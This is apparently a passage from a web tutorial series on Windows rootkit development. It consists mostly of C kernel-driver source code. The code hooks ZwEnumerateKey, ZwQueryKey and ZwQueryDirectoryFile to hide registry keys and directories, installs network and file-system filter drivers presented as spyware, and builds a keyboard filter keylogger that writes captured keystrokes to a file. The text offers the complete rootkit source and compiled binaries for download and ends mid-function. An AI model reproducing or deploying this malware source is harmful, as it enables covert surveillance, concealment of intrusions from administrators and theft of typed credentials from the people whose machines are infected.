                                                                                                SERVICE_KEY3_LENGTH) )

                                                                { //if it is one of our desired subkeys then ++ offset

                                                                                offset++;

                                                                }

                                                else

                                                                {

                                                                                visibleSubkeys++;

                                                                }

                                                AddIndices( pKeyHandle, index, (index + offset));

                                                index++;

                                }

                                else

                                {

                                                // STATUS_NO_MORE_ENTRIES

                                                break;

                                }

                }

                if( offset > 1 )

                {

                                // required if more than one sub key was found

                                AdjustIndices( pKeyHandle, offset );

                }

 

                ExFreePool( (PVOID)pInfoStruct );

               

                /* update data about this handle */

                if( pKeyHandle )

                {

                                REG_KEY_DATA* pKeyData = ((REG_KEY_DATA*)( pKeyHandle->keyData ));

                                if( pKeyData )

                                {

                                                pKeyData->subkeys = visibleSubkeys; //This line is important, since the effect of this line makes GetSubkeyCount in NewZwQueryKey does not reflect the hidden keys in the size

                                }

                                AddNewKeyHandle( pKeyHandle );

                }             

                return 0;

}

 

FindKeyHandle and FreeKeyHandle intend to update the previously built tree because it is possible that since the last execution it’s been modified. AllocateKeyHandle just returns a dynamically allocated KeyHandle buffer. AddIndex set the new index and AddNewKeyHandle adds this key with its subkeys to the tree. The challenging function is AdjustIndices function. After adding all the subkeys if we have had more than one hidden subkey we need to adjust the new indexes of the data structure. Because after adding the indexes of the root key to the data structure it is like Figure 1 (according to the aforementioned example at the beginning of the article):

 Rootkit concealment registry hiding

As you see we want to hide the 6 and 10 keys but 10 is still returned for the 9 key. To adjust indexes we use the codes below:

// reindex key pair list when more than one

// sub key is hidden under a single key

void AdjustIndices( KEY_HANDLE* pKeyHandle, int hiddenKeys )

{

                KeAcquireSpinLock(&g_registrySpinLock, &g_pCurrentIRQL);

 

                if(            pKeyHandle->keyData )

                {

                                REG_KEY_DATA* pKeyData = ((REG_KEY_DATA*)( pKeyHandle->keyData ));

                                if( pKeyData )

                                {

                                                int offset = 0;

                                                SUBKEY_DATA* pSubkeyData = pKeyData->subkeyData;

                                               

                                                // loop through indices looking for hidden keys

                                                while( pSubkeyData->next != NULL )

                                                {

                                                                if( pSubkeyData->subkeyIndex + offset != pSubkeyData->newIndex ) //goes forward till finding the first hidden key, after finding it adjusts the keys before the next hidden the key to the end

                                                                {

                                                                                hiddenKeys--;

                                                                                // adjust next hidden key

                                                                                offset++;

                                                                                pSubkeyData = AdjustNextNewIndex( pSubkeyData, offset ); //This function adjusts new indexes if there is a hidden key after this hidden key.

                                                                                offset = pSubkeyData->newIndex - pSubkeyData->subkeyIndex;

                                                                }

                                                                pSubkeyData = pSubkeyData->next;

                                                                // no need to exceed show count

                                                                if( !hiddenKeys )

                                                                                break;

                                                }

                                }

                }

                KeReleaseSpinLock( &g_registrySpinLock, g_pCurrentIRQL );

}

// increment next newIndex

SUBKEY_DATA* AdjustNextNewIndex( SUBKEY_DATA* pSubkeyData, int offset )

{

                SUBKEY_DATA* targetKey = NULL;;

 

                while( pSubkeyData->next != NULL )

                {

                                if( pSubkeyData->next->subkeyIndex + offset != pSubkeyData->next->newIndex ) //goes forward till finding the next hidden key since the offset passed to this function incremented

                                {

                                                // next key is a hidden key

                                                // so increment newIndex

                                                if( targetKey == NULL )

                                                {

                                                                targetKey = pSubkeyData;//targetKey points to the element before the next hidden key if it is null

                                                }

                                                else

                                                {

                                                                // adjust all new indices

                                                                // until next non hidden key

                                                                SUBKEY_DATA* tempKey = targetKey;

                                                                while( tempKey != pSubkeyData) //This while executes for two adjacent hidden keys

                                                                {

                                                                                tempKey->next->newIndex++;

                                                                                tempKey = tempKey->next;

                                                                }

                                                }

                                                targetKey->newIndex++;

                                                offset++;

                                }

                                else

                                {

                                                // keep incrementing newIndex

                                                // until next key is not hidden

                                                if( targetKey )

                                                                break;

                                }

                                pSubkeyData = pSubkeyData->next;

                }

                // list is now good up to target key

                return targetKey;

}

 

After the execution of the AdjustIndices function the subkeys indexes become like figure 2:

rootkit concealment registry hiding

To clarify the concept let’s execute AdjustIndexes for the aforementioned example. Ok start from index 1 to 12 and see what happens:

For 1 the system returns the first key.

For 2 the system returns the second key.

For 6 the system returns the 7th key. Ok here we hided the actual 6 by skipping it and returning the next key.

For 7 we return the 8th key (this is correct since the next key after the 7th which we had returned is 8th key)

For 9 we can’t return the 10th key. Because the 10th is also hidden, so we should return the next key after the 10th which is 11th.

For 10 we return the 12th. (12th hides the 10 as long as it is not the 10thJ!)

Remember since we have hooked NewZwQueryKey too and had returned size 10 in NewZwQueryKey, the NewZwEnumerateKey will stop at 10th so don’t worry about the 11 and 12 in our index table.

After creating new indexes we are ready to return them to the user (and system) and hide the registry keys. We hook ZwEnumerateKey and ZwQueryKey functions and replace these codes of ourselves:

// return number of subkeys from special index

// when the parent key is \\Services

NTSTATUS NewZwQueryKey( IN HANDLE KeyHandle, //This function has been hooked to return the size of subkeys of a parent key minus the hidden keys. This help us to not worry that system queries keys in our crafted list that we return indexes outside the bond

                IN KEY_INFORMATION_CLASS KeyInformationClass,

                OUT PVOID KeyInformation,

                IN ULONG Length,

                OUT PULONG ResultLength )

{

    int status;

                ULONG numberOfSubkeys = -1;

 

    status = OldZwQueryKey(

                                KeyHandle,

                                KeyInformationClass,

                                KeyInformation,

                                Length,

                                ResultLength );

   

                numberOfSubkeys = GetSubkeyCount( KeyHandle ); //Return the real size - number of hidden keys

               

                if(            (status == STATUS_SUCCESS) && (numberOfSubkeys != -1) )

                                if( KeyFullInformation == KeyInformationClass )

                                                if( KeyInformation )

                                                                ((KEY_FULL_INFORMATION*)KeyInformation)->SubKeys = numberOfSubkeys;

 

                return status;

}

 

// return special index values

// when the parent key is \\Services

NTSTATUS NewZwEnumerateKey( IN HANDLE KeyHandle, //In this hooked function we manipulate the request of the caller. We never ask the system for the indexes of hidden keys

                IN ULONG Index,

                IN KEY_INFORMATION_CLASS KeyInformationClass,

                OUT PVOID KeyInformation,

                IN ULONG Length,

                OUT PULONG ResultLength )

{

    int status;

                int new_index;

 

                new_index = GetNewIndex( KeyHandle, Index ); //In new indexes we never return the index of hidden keys

 

                if( new_index != -1 )

                                Index = new_index;

 

    status = OldZwEnumerateKey( //Thus here the result we return are those invisible keys and because we also hooked NewZwQueryKey we do not worry about querying more than exists

                                KeyHandle,

                                Index,

                                KeyInformationClass,

                                KeyInformation,

                                Length,

                                ResultLength );

 

    return status;

}

 

To see the complete rootkit source code, download the sources and the compiled version (for XP SP3 gold edition) for both this and the next rootkit concealment articles. After compiling to test the registry hiding functionality open the registry editor and add SSSDriver1, SSSDriver2 keys under the Services key. Close the registry editor, load the rootkit, run and open the registry editor to see the effect

Directory hiding c++ source code

Directory hiding is much simpler than registry hiding. The only thing we need to do is to hook ZwQueryDirectoryFile and then return the results (directory listing) of parent directory without the traces of our hidden directory:

NTSTATUS NewZwQueryDirectoryFile(

                IN HANDLE hFile,

                IN HANDLE hEvent OPTIONAL,

                IN PIO_APC_ROUTINE IoApcRoutine OPTIONAL,

                IN PVOID IoApcContext OPTIONAL,

                OUT PIO_STATUS_BLOCK pIoStatusBlock,

                OUT PVOID FileInformationBuffer,

                IN ULONG FileInformationBufferLength,

                IN FILE_INFORMATION_CLASS FileInfoClass,

                IN BOOLEAN bReturnOnlyOneEntry,

                IN PUNICODE_STRING PathMask OPTIONAL,

                IN BOOLEAN bRestartQuery

)

{

                NTSTATUS status;

 

                status = OldZwQueryDirectoryFile(

                                                hFile,

                                                hEvent,

                                                IoApcRoutine,

                                                IoApcContext,

                                                pIoStatusBlock,

                                                FileInformationBuffer,

                                                FileInformationBufferLength,

                                                FileInfoClass,

                                                bReturnOnlyOneEntry,

                                                PathMask,

                                                bRestartQuery);

 

                if( NT_SUCCESS( status ) && (FileInfoClass == 3) ) //Because ZwQueryDirectoryFile  is used for other purposes than querying directory

                {                             

                                BOOL isLastDirectory;

                                DirEntry* pLastDirectory = NULL;

                                DirEntry* pThisDirectory = (DirEntry*)FileInformationBuffer;

                                // for each directory entry in the list

                                do

                                {

                                                isLastDirectory = !( pThisDirectory->dwLenToNext );

                                               

                                                // compare with g_hiddenDirectoryName

                                                if( RtlCompareMemory( (PVOID)&pThisDirectory->suName[ 0 ], //Compares two blocks of memory starting from the first and second parameter, returns the number of bytes that match. In case it is the HIDDEN_DIR_NAME_LENGTH, it means two strings are equal.

                                                                (PVOID)&g_hiddenDirectoryName[ 0 ],

                                                                HIDDEN_DIR_NAME_LENGTH ) == HIDDEN_DIR_NAME_LENGTH )

                                                {

                                                                if( isLastDirectory )

                                                                {

                                                                                // return STATUS_NO_MORE_FILES if the hidden

                                                                                // directory is the only directory in the list

                                                                                // else set the previous directory to end-of-list

                                                                                // if hidden directory is at the end of the list

                                                                                if( pThisDirectory == (DirEntry*)FileInformationBuffer )

                                                                                                status = 0x80000006;

                                                                                else

                                                                                                pLastDirectory->dwLenToNext = 0; //dwLenToNext shows the length of its element except the last element. It does not cause any harms in finding the next directory since we will use the dwLenToNext in lines 396 and 397 when it has a value and after that in the next iteration the value will become zero

                                                                                break;

                                                                }

                                                                else

                                                                {

                                                                                // copy remainder of directory list into this location

                                                                                // to eliminate this directory entry from the list

                                                                                int offset = ((ULONG)pThisDirectory) - (ULONG)FileInformationBuffer; //Offset to the found entry (the directory we want to hide)

                                                                                int size = (DWORD)FileInformationBufferLength - offset - pThisDirectory->dwLenToNext; // Subtracting the offset to the directory and the length of directoty gives us the length of remaining bytes

                                                                                RtlCopyMemory( (PVOID)pThisDirectory, //We copy bytes after the directory (to the end), to the place of directory so removing the directory data

                                                                                                (PVOID)((char*)pThisDirectory + pThisDirectory->dwLenToNext ),

                                                                                                (DWORD)size );

                                                                                continue;

                                                                }

                                                }

                                                pLastDirectory = pThisDirectory;

                                                pThisDirectory = (DirEntry*)((char *)pThisDirectory + pThisDirectory->dwLenToNext );

                                } while( !isLastDirectory );

                }

 

                return( status );

}

 

To achieve directory hiding we follow three logics. First if the FileInformationBuffer returned by original ZwQueryDirectoryFile contains only our directory we return “status = 0x80000006”. It means directory has no contents. Second if the parent directory contains our hidden directory in addition to other directories and our hidden directory is the last element we just remove it from FileInformationBuffer. Third if FileInformationBuffer contains our hidden directory but it is not the last element we remove our hidden directory by overwriting the elements after it on it.

Published in Rootkit development
Monday, 01 June 2015 00:00

keylogger source code

Keylogger Source Code

Spyware is a type of malware that aims to record every move you make. This means a spyware records your network traffics, files and things you type with your keyboard. Spyware source code mostly consists of driver related source codes. The rootkit source code should identify itself as a network, file system and keyboard driver. After that IO requests to write to a disk, read from network and input a key will flow through the rootkit and we can record the data. Figure 1 shows the concept. Although recording those resources may seem similar, the technical details in keylogger source code is different than than other rootkit source codes like File system spyware source code. Among keyloggers, network spyware and file system spyware, intercepting network traffic is the easiest. We start from the network spyware source code and then add other technical details to monitor file system and finally write a keylogger.

rootkit spyware design

Figure 1(rootlkit spyware design)

Network spyware source code

Intercepting network traffic is possible by placing a filter on top of all network drivers. . In simple words the filter is something we do before calling the real device driver. For example if a user wants to ping a host we do something first and then we call the driver. Filtering is a capability which exists in windows – of course for other purposes— and we take advantage of it. To add a filter we just need to add our driver to chain of drivers, and after that ours is the first one in the chain which will be called. This task can be done using IoAttachDevice:

// spyware source code
// rootkit source code
NTSTATUS DriverEntry( IN PDRIVER_OBJECT pDriverObject, IN PUNICODE_STRING theRegistryPath )

{

                int loop;

                DRIVER_DATA* driverData;

    UNICODE_STRING deviceName = { 0 };

    UNICODE_STRING deviceLink = { 0 };

                PDEVICE_OBJECT pDeviceController;

                PWSTR SymbolicLinkList;

 

                // Create the device controller

                RtlInitUnicodeString( &deviceName, GHOST_DEVICE_CREATE_NAME );

                IoCreateDevice( pDriverObject,

                                 0,

                                 &deviceName,

                                 FILE_DEVICE_UNKNOWN,

                                 0,

                                 FALSE,

                                 &pDeviceController );

    RtlInitUnicodeString( &deviceLink, GHOST_DEVICE_LINK_NAME );

    IoCreateSymbolicLink( &deviceLink, &deviceName );

 

                // Route standard I/O through our dispatch routine

                for(loop = 0; loop < IRP_MJ_MAXIMUM_FUNCTION; loop++)

                                pDriverObject->MajorFunction[loop] = OnDispatch;

 

 

                if( !NT_SUCCESS( insertNetworkFilter( pDriverObject,

                                &oldNetworkDevice,

                                &newNetworkDevice,

                                L"\\Device\\Tcp") ) )

                                DbgPrint("comint32: Could not insert network filter");

 

 

                return STATUS_SUCCESS;

}

NTSTATUS insertNetworkFilter(PDRIVER_OBJECT pDriverObject,

                PDEVICE_OBJECT* ppOldDevice,

                PDEVICE_OBJECT* ppNewDevice,

                wchar_t* deviceName)

{

                NTSTATUS status = STATUS_SUCCESS;

                UNICODE_STRING unicodeName = { 0 };

 

                // Create a new device

                status = IoCreateDevice( pDriverObject,

                                0,

                                NULL,

                                FILE_DEVICE_UNKNOWN,

                                0,

                                TRUE,

                                ppNewDevice );

 

                if( !NT_SUCCESS( status ) )

                                return status;

 

                // Initialize the new device

                ((PDEVICE_OBJECT)(*ppNewDevice))->Flags |= DO_DIRECT_IO;

 

                // Attach the new device

                RtlInitUnicodeString( &unicodeName, deviceName );

                status = IoAttachDevice( *ppNewDevice,

                                &unicodeName,

                                ppOldDevice );

 

                // Prevent unload if load failed

                if( !NT_SUCCESS( status ) )

                {

                                IoDeleteDevice( *ppNewDevice );

                                *ppNewDevice = NULL;

                }

 

                return status;

}

 

 

File system spyware source code

To add the driver to the chain of file system drivers we must use IoAttachDeviceToDeviceStack method. This method is a little different than IoAttachDevice, because we have to find the last file system driver in the chain and attach our driver to it:

// rootkit source code
// spyware source code
NTSTATUS DriverEntry( IN PDRIVER_OBJECT pDriverObject, IN PUNICODE_STRING theRegistryPath )

{

….

                if( !NT_SUCCESS( insertFileFilter( pDriverObject,

                                &oldFileSysDevice,

                                &newFileSysDevice,

                                L"\\DosDevices\\C:\\") ) )

                                DbgPrint("comint32: Could not insert file system filter");

….

}

NTSTATUS insertFileFilter(PDRIVER_OBJECT pDriverObject,

                PDEVICE_OBJECT* ppOldDevice,

                PDEVICE_OBJECT* ppNewDevice,

                wchar_t* deviceName)

{

                NTSTATUS                                           status;

                UNICODE_STRING                           unicodeDeviceName;

                HANDLE                                                               fileHandle;

                IO_STATUS_BLOCK                         statusBlock = { 0 };

                OBJECT_ATTRIBUTES      objectAttributes = { 0 };

                PFILE_OBJECT                    fileObject;

 

                // Get the device for the specified drive

                RtlInitUnicodeString( &unicodeDeviceName, deviceName );

                InitializeObjectAttributes( &objectAttributes,

                                &unicodeDeviceName,

                                OBJ_CASE_INSENSITIVE,

                                NULL,

                                NULL );

 

                status = ZwCreateFile( &fileHandle,

                                SYNCHRONIZE|FILE_ANY_ACCESS,

                                &objectAttributes,

                                &statusBlock,

                                NULL,

                                0,

                                FILE_SHARE_READ | FILE_SHARE_WRITE,

                                FILE_OPEN,

                                FILE_SYNCHRONOUS_IO_NONALERT | FILE_DIRECTORY_FILE,

                                NULL,

                                0 );

 

                if( !NT_SUCCESS( status ) )

                                return status;

 

                status = ObReferenceObjectByHandle( fileHandle,

                                FILE_READ_DATA,

                                NULL,

                                KernelMode,

                                (PVOID *)&fileObject,

                                NULL );

 

                if( !NT_SUCCESS( status ) )

                {

                                ZwClose( fileHandle );

                                return status;

                }

 

                *ppOldDevice = IoGetRelatedDeviceObject( fileObject );

 

                if( !*ppOldDevice )

                {

                                ObDereferenceObject( fileObject );

                                ZwClose( fileHandle );

                                return STATUS_ABANDONED;

                }

 

                // Create a new device

    status = IoCreateDevice( pDriverObject,

         0,

         NULL,

         (*ppOldDevice)->DeviceType,

         0,

         FALSE,

         ppNewDevice );

 

    if( !NT_SUCCESS( status ) )

                {

                                ObDereferenceObject( fileObject );

                                ZwClose( fileHandle );

                                return status;

                }

 

                // Initialize the new device

    if( (*ppOldDevice)->Flags & DO_BUFFERED_IO )

                                (*ppNewDevice)->Flags |= DO_BUFFERED_IO;

    if( (*ppOldDevice)->Flags & DO_DIRECT_IO )

                                (*ppNewDevice)->Flags |= DO_DIRECT_IO;

    if( (*ppOldDevice)->Characteristics & FILE_DEVICE_SECURE_OPEN )

                                (*ppNewDevice)->Characteristics |= FILE_DEVICE_SECURE_OPEN;

 

                // Attach the new device to the old device

                *ppOldDevice = IoAttachDeviceToDeviceStack( *ppNewDevice, *ppOldDevice );

                if( *ppOldDevice == NULL )

                {

                                // Prevent unload if load failed

                                IoDeleteDevice( *ppNewDevice );

                                *ppNewDevice = NULL;

                                // Clean up and return error

                                ObDereferenceObject( fileObject );

                                ZwClose( fileHandle );

        return STATUS_NO_SUCH_DEVICE;

                }

 

                ObDereferenceObject( fileObject );

                ZwClose( fileHandle );

 

                return STATUS_SUCCESS;

}

 

 

There is one more difference in file system monitoring; sometimes the driver should respond from the cache to the fast Io requests so in order to handle those requests we must add a couple of lines:

// spyware source code
// rootkit source code
NTSTATUS DriverEntry( IN PDRIVER_OBJECT pDriverObject, IN PUNICODE_STRING theRegistryPath )

{

                PFAST_IO_DISPATCH pFastIoDispatch;

….

                pFastIoDispatch = (PFAST_IO_DISPATCH)ExAllocatePool( NonPagedPool, sizeof( FAST_IO_DISPATCH ) );

    if( !pFastIoDispatch )

                {

                    IoDeleteSymbolicLink( &deviceLink );

                                IoDeleteDevice( pDeviceController );

                                DbgPrint("comint32: Could not allocate FAST_IO_DISPATCH");                  

                                return STATUS_UNSUCCESSFUL;

                }

                RtlZeroMemory( pFastIoDispatch, sizeof( FAST_IO_DISPATCH ) );

                pFastIoDispatch->SizeOfFastIoDispatch = sizeof(FAST_IO_DISPATCH);

                pFastIoDispatch->FastIoDetachDevice = FastIoDetachDevice;

                pFastIoDispatch->FastIoCheckIfPossible = FastIoCheckIfPossible;

                pFastIoDispatch->FastIoRead = FastIoRead;

                pFastIoDispatch->FastIoWrite = FastIoWrite;

                pFastIoDispatch->FastIoQueryBasicInfo = FastIoQueryBasicInfo;

                pFastIoDispatch->FastIoQueryStandardInfo = FastIoQueryStandardInfo;

                pFastIoDispatch->FastIoLock = FastIoLock;

                pFastIoDispatch->FastIoUnlockSingle = FastIoUnlockSingle;

                pFastIoDispatch->FastIoUnlockAll = FastIoUnlockAll;

                pFastIoDispatch->FastIoUnlockAllByKey = FastIoUnlockAllByKey;

                pFastIoDispatch->FastIoDeviceControl = FastIoDeviceControl;

                pFastIoDispatch->FastIoQueryNetworkOpenInfo = FastIoQueryNetworkOpenInfo;

                pFastIoDispatch->MdlRead = FastIoMdlRead;

                pFastIoDispatch->MdlReadComplete = FastIoMdlReadComplete;

                pFastIoDispatch->PrepareMdlWrite = FastIoPrepareMdlWrite;

                pFastIoDispatch->MdlWriteComplete = FastIoMdlWriteComplete;

                pFastIoDispatch->FastIoReadCompressed = FastIoReadCompressed;

                pFastIoDispatch->FastIoWriteCompressed = FastIoWriteCompressed;

                pFastIoDispatch->MdlReadCompleteCompressed = FastIoMdlReadCompleteCompressed;

                pFastIoDispatch->MdlWriteCompleteCompressed = FastIoMdlWriteCompleteCompressed;

                pFastIoDispatch->FastIoQueryOpen = FastIoQueryOpen;

                pDriverObject->FastIoDispatch = pFastIoDispatch;

….

}
 

 

All of the functions (FastIoDetachDevice, FastIoCheckIfPossible, FastIoRead and etc.) should be defined but the logic behind them is similar. We place a filter function to process requests and then call the original FastIoXXX function. An example of function definitions:
// spyware source code
// rootkit source code
BOOLEAN FastIoCheckIfPossible( IN PFILE_OBJECT FileObject,

                IN PLARGE_INTEGER FileOffset,

                IN ULONG Length,

                IN BOOLEAN Wait,

                IN ULONG LockKey,

                IN BOOLEAN CheckForReadOperation,

                OUT PIO_STATUS_BLOCK IoStatus,

                IN PDEVICE_OBJECT DeviceObject )

{

                PFAST_IO_DISPATCH     fastIoDispatch;

 

                filterFastIo( FileObject, TRUE, FIO_CHECK_IF_POSSIBLE ); //this is the filter function which will be called in every fastIO

                fastIoDispatch = oldFileSysDevice->DriverObject->FastIoDispatch; // this line up to return aims to call the original routine of oldxxxDevice and return the result

                if( VALID_FAST_IO_DISPATCH_HANDLER( fastIoDispatch, FastIoCheckIfPossible ) ) // a macro defined that do a series of check to see that such function exist in oldxxxDevice

                {

                                return (fastIoDispatch->FastIoCheckIfPossible)( FileObject,

                                                FileOffset,

                                                Length,

                                                Wait,

                                                LockKey,

                                                CheckForReadOperation,

                                                IoStatus,

                                                oldFileSysDevice );

                }

                return FALSE;

}

void filterFastIo( PFILE_OBJECT file, BOOL cache, int function )

{

                // This would be a great place to filter fast file I/O

 

                UNREFERENCED_PARAMETER( file );

                UNREFERENCED_PARAMETER( cache );

                UNREFERENCED_PARAMETER( function );

                return;

 

}

 

After placing the filters the OnDispatch function can intercept the resource, for example in the OnDispatch function below we just show a dubug statement to show the functionality:

// spyware source code
// rootkit source code
NTSTATUS OnDispatch( PDEVICE_OBJECT DeviceObject, PIRP Irp )
{
	PIO_STACK_LOCATION	irpStack;
	PVOID			inputBuffer;
	PVOID			outputBuffer;
	ULONG			inputBufferLength;
	ULONG			outputBufferLength;
	ULONG			ioControlCode;
	NTSTATUS		status;

	// Get the IRP stack
	irpStack = IoGetCurrentIrpStackLocation (Irp);

	// Intercept I/O Request Packets to the TCP/IP driver
	if( DeviceObject == newNetworkDevice )
	{
		if( irpStack->MajorFunction == IRP_MJ_CREATE )
			DbgPrint("comint32: TCP/IP - CREATE");

		IoSkipCurrentIrpStackLocation ( Irp );
		return IoCallDriver( oldNetworkDevice, Irp );
	}
	// Intercept I/O Request Packets to drive C
	if( DeviceObject == newFileSysDevice )
	{
		if( irpStack->MajorFunction == IRP_MJ_QUERY_VOLUME_INFORMATION )
			DbgPrint("comint32: FILE SYSTEM - VOLUME QUERY");

		IoSkipCurrentIrpStackLocation ( Irp );
		return IoCallDriver( oldFileSysDevice, Irp );
	}
...
}

 

 

 

C++ keylogger source code

Keyloggers are like network and file system spywares but reading the keyboard buffer before it will be sent to any other applications cannot be done by simply placing the filter. The filter itself places the rootkit on top of all other drivers so it will become the first driver receiving the IO request. Figure 2 shows the overall view of the system.

Keylogger source code execution flow

Figure 2 (Keylogger source code execution flow)

This implicitly means we must write a keyboard driver to process the IO request but we just need the processed request and the key code. By inserting a filter driver on top of the stack of drivers and setting a completion routine which will be called after the lower driver operation – this is an inherit capability which every higher driver can set a completion routine driver to be called after lower driver operation—we overcome the problem of writing the driver from the ground up. Thus we allow the original keyboard driver does its task and provides us the key, after that our completion routine will be called and we have the access to the key code. Calling the original keyboard driver and setting a completion routine is simple; to set our completion routine we create a new Irp. The new Irp copies all of the data of old Irp except the MajorFunction. We set the MajorFunction to IRP_MJ_READ (we came from an IRP_MJ_READ case in the dispatch method). Moreover this Irp points to the original Irp as the next Irp to handle other completion routines. 

Code below places the driver on top of keyboard driver chains:

// keylogger source code
NTSTATUS DriverEntry( IN PDRIVER_OBJECT pDriverObject, IN PUNICODE_STRING theRegistryPath )
{
….
	if( !NT_SUCCESS( insertNetworkFilter( pDriverObject,
		&oldNetworkDevice,
		&newNetworkDevice,
		L"\\Device\\Tcp") ) )
		DbgPrint("comint32: Could not insert network filter");
….
}
NTSTATUS insertKeyboardFilter(PDRIVER_OBJECT pDriverObject,
	PDEVICE_OBJECT* ppOldDevice,
	PDEVICE_OBJECT* ppNewDevice,
	wchar_t* deviceName)
{
	NTSTATUS status = STATUS_SUCCESS;
	UNICODE_STRING unicodeName = { 0 };

	// Create a new device
	status = IoCreateDevice( pDriverObject,
		0,
		NULL,
		FILE_DEVICE_KEYBOARD,
		0,
		FALSE,
		ppNewDevice );

	if( !NT_SUCCESS( status ) )
		return status;

	// Initialize the new device
	((PDEVICE_OBJECT)(*ppNewDevice))->Flags |= (DO_BUFFERED_IO | DO_POWER_PAGABLE);
	((PDEVICE_OBJECT)(*ppNewDevice))->Flags &= ~DO_DEVICE_INITIALIZING;

	// Attach the new device
	RtlInitUnicodeString( &unicodeName, deviceName );
	status = IoAttachDevice( *ppNewDevice, //adding filter
		&unicodeName,
		ppOldDevice );

	// Prevent unload if load failed
	if( !NT_SUCCESS( status ) )
	{
		IoDeleteDevice( *ppNewDevice );
		*ppNewDevice = NULL;
	}
	else
	{
		// Prepare the keylogging thread
		StartKeylogger( pDriverObject ); //this is here because of write-to-file-at-PASSIVE_LEVEL limit. so when driver entry calls the insertFilter this thread will be initialized and wait to be signaled by a semaphore
	}

	return status;
}

 

 

Completion routine

To create the new Irp and set the Completion routine we use below code:

  

// keylogger source code
NTSTATUS OnDispatch( PDEVICE_OBJECT DeviceObject, PIRP Irp )
{
PIO_STACK_LOCATION irpStack;
PVOID inputBuffer;
PVOID outputBuffer;
ULONG inputBufferLength;
ULONG outputBufferLength;
ULONG ioControlCode;
NTSTATUS status;

// Get the IRP stack
irpStack = IoGetCurrentIrpStackLocation (Irp);

....

// Intercept I/O Request Packets to the keyboard
if( DeviceObject == newKeyboardDevice )
{
if( irpStack->MajorFunction == IRP_MJ_READ )
return OnKeyboardRead( DeviceObject, Irp, irpStack ); //modified so the reading from keyword will be monitored by this function
//The OnKeyKeyboard creates a new Irp from the old one and set an IoCompletionRoutine for it. After that it calls the next driver with the new Irp
IoSkipCurrentIrpStackLocation ( Irp );
return IoCallDriver( oldKeyboardDevice, Irp );
}

....

}



NTSTATUS OnKeyboardRead( PDEVICE_OBJECT pDeviceObject,
 PIRP Irp,
 PIO_STACK_LOCATION irpStack )
{
 NTSTATUS status;
 PIRP newIrp;
 PIO_STACK_LOCATION newirpStack;

 // create new irp
 newIrp = IoAllocateIrp( pDeviceObject->StackSize, FALSE );
 IoSetNextIrpStackLocation( newIrp );
 newirpStack = IoGetCurrentIrpStackLocation( newIrp );
 newIrp->AssociatedIrp.SystemBuffer = Irp->AssociatedIrp.SystemBuffer;
 newIrp->RequestorMode = KernelMode; // Irp->RequestorMode;
 newIrp->Tail.Overlay.Thread = Irp->Tail.Overlay.Thread;
 newIrp->Tail.Overlay.OriginalFileObject = Irp->Tail.Overlay.OriginalFileObject;
 newIrp->Flags = Irp->Flags;
 newirpStack->MajorFunction = IRP_MJ_READ;
 newirpStack->MinorFunction = irpStack->MinorFunction;
 newirpStack->Parameters.Read = irpStack->Parameters.Read;
 newirpStack->DeviceObject = pDeviceObject;
 newirpStack->FileObject = irpStack->FileObject;
 newirpStack->Flags = irpStack->Flags;
 newirpStack->Control = 0;
 IoCopyCurrentIrpStackLocationToNext( newIrp );//the IoCopyCurrentIrpStackLocationToNext routine copies the IRP stack parameters from the current I/O stack location to the stack location of the next-lower driver
 IoSetCompletionRoutine( newIrp, OnReadCompletion, Irp, TRUE, TRUE, TRUE ); //onReadCompletion will be called after next lower driver complete its job
 // set cancel routine to allow driver to unload
 IoSetCancelRoutine( Irp, OnCancel );//The IoSetCancelRoutine routine sets up a driver-supplied Cancel routine to be called if a given IRP is canceled
 ....
 // pass new irp in place of old irp
 status = IoCallDriver( oldKeyboardDevice, newIrp );
 ...
} 
 NTSTATUS OnReadCompletion(IN PDEVICE_OBJECT pDeviceObject,
IN PIRP pIrp,
IN PVOID Context)
{
//Read the key from buffer and signal KeyLoggerThread to write it to a file by releasing semaphore
}

 

The completion routine has access to the Key code (the buffer of Irp) and by a hash table can easily convert it to a character but the completion routine itself cannot save the key code in a file.  That’s because our completion routine runs in IRQL = DISPATCH_LEVEL (because the execution flows from IRP_MJ_READ in dispatch function of driver) but file operation should be done in PASSIVE_LEVEL. If we try to write to a file in DISPATCH_LEVEL the system will crash. To circumvent this problem, we start a thread in driveEntrty which runs at PASSIVE_LEVEL. This thread waits behind a semaphore for a key to be read. The completion routine releases the semaphore after it reads a key code and writes the character to a shared buffer. The thread saves the character to a file.

   

// keylogger source code
VOID KeyLoggerThread(PVOID StartContext)
{
...
             while( TRUE )

                {

                                // wait for a key

                                KeWaitForSingleObject( &keyboardData.keySemaphore,

                                                Executive,

                                                KernelMode,

                                                FALSE,

                                                NULL );

 

                                pListEntry = ExInterlockedRemoveHeadList( &keyboardData.keyList,

                                                &keyboardData.keyLock );

                               

                                if( keyboardData.terminateFlag == TRUE ) //this will be set it stop...

                                                PsTerminateSystemThread( STATUS_SUCCESS );

                               

                                // ** get BASE ADDRESS of instance **

                                keyData = CONTAINING_RECORD( pListEntry, KEY_DATA, ListEntry ); //the first arguement is the field of structure we have, second parameter is the field we're looking for, the 3rd arguement is the type of structure

 

                                // convert scan code to key

                                key[0] = key[1] = key[2] = 0; // this is already 0 because for CTRL characters there is no key insertion so this is default value when not set

                                GetKey( keyData, key );  //copy the charachter or reveal that it is a CRTL key

 

                                if( key[0] != 0 )

                                {

                                                if(keyboardData.hLogFile != NULL)

                                                {             

                                                                IO_STATUS_BLOCK io_status;

                                                   

                                                                status = ZwWriteFile(keyboardData.hLogFile,

                                                                                NULL,

                                                                                NULL,

                                                                                NULL,

                                                                                &io_status,

                                                                                &key,

                                                                                strlen(key),

                                                                                NULL,

                                                                                NULL);

                                                }

                                }             

                }
	...
}

 

 

The execution flow of the keylogging process after the definition of the completion routine in rootkit keylogger is as shown in figure 3:

Keylogger keylogging process

Figure 3 (Keylogger keylogging process)

There is one more thing; The system will crash if we unload the driver or user cancels the operation but the IRP still tries to call completion routine. To bypass this problem we keep track of uncompleted original IRP and our new IRP (by saving incomplete irps in a ListEntry):

// keylogger source code
NTSTATUS OnKeyboardRead( PDEVICE_OBJECT pDeviceObject,
	PIRP Irp,
	PIO_STACK_LOCATION irpStack )
{
...

                // save old irp

                Irp->Tail.Overlay.DriverContext[0] = newIrp; //we need this in case of cancelation to find the newIrp

                ExInterlockedInsertHeadList( &keyboardData.irpList,

                                &Irp->Tail.Overlay.ListEntry, //saving this will save the origIrp as Irp->Tail.Overlay.ListEntry ( &Tail.Overlay.ListEntry is listEntry type of the irp.) and newIrp as part of Irp->Tail.Overlay.ListEntry (Tail.Overlay.DriverContext)

                                &keyboardData.irpLock );
...
}

NTSTATUS OnReadCompletion(IN PDEVICE_OBJECT pDeviceObject,
	IN PIRP pIrp,
